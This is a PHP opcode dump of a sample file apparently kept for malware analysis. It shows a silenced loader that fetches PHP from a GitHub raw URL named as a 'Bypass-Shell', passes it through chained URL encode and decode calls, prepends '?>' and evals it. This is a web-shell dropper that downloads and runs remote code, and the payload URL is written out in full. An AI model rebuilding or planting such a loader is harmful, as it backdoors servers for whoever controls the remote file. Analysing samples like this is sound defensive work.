|filename:|/root/samples/lunarlitespeed.php
|functionname:|(null)
|numberofops:|23
|compiledvars:|none
|line|#*|||op|fetch|ext|return|operands
|2|0|E>|BEGIN_SILENCE|||~0|
||1||END_SILENCE||||~0|
||2||ECHO||||null|
||3||BEGIN_SILENCE|||~1|
||4||INIT_FCALL||||'file_get_contents'|
||5||INIT_FCALL||||'urldecode'|
||6||INIT_FCALL||||'urlencode'|
||7||INIT_FCALL||||'rawurldecode'|
||8||INIT_FCALL||||'rawurlencode'|
||9||SEND_VAL||||'https%3A%2F%2Fraw.githubusercontent.com%2FAlexspedo168%2FKeqing-Bypass-Shell%2Frefs%2Fheads%2Fmain%2Flunar.php'|
||10||DO_ICALL|||$2|
||11||SEND_VAR||||$2|
||12||DO_ICALL|||$3|
||13||SEND_VAR||||$3|
||14||DO_ICALL|||$4|
||15||SEND_VAR||||$4|
||16||DO_ICALL|||$5|
||17||SEND_VAR||||$5|
||18||DO_ICALL|||$6|
||19||CONCAT|||~7|'%3F%3E'|,|$6|
||20||INCLUDE_OR_EVAL||||~7|,|EVAL|
||21||END_SILENCE||||~1|
|3|22|>|RETURN||||1|
|
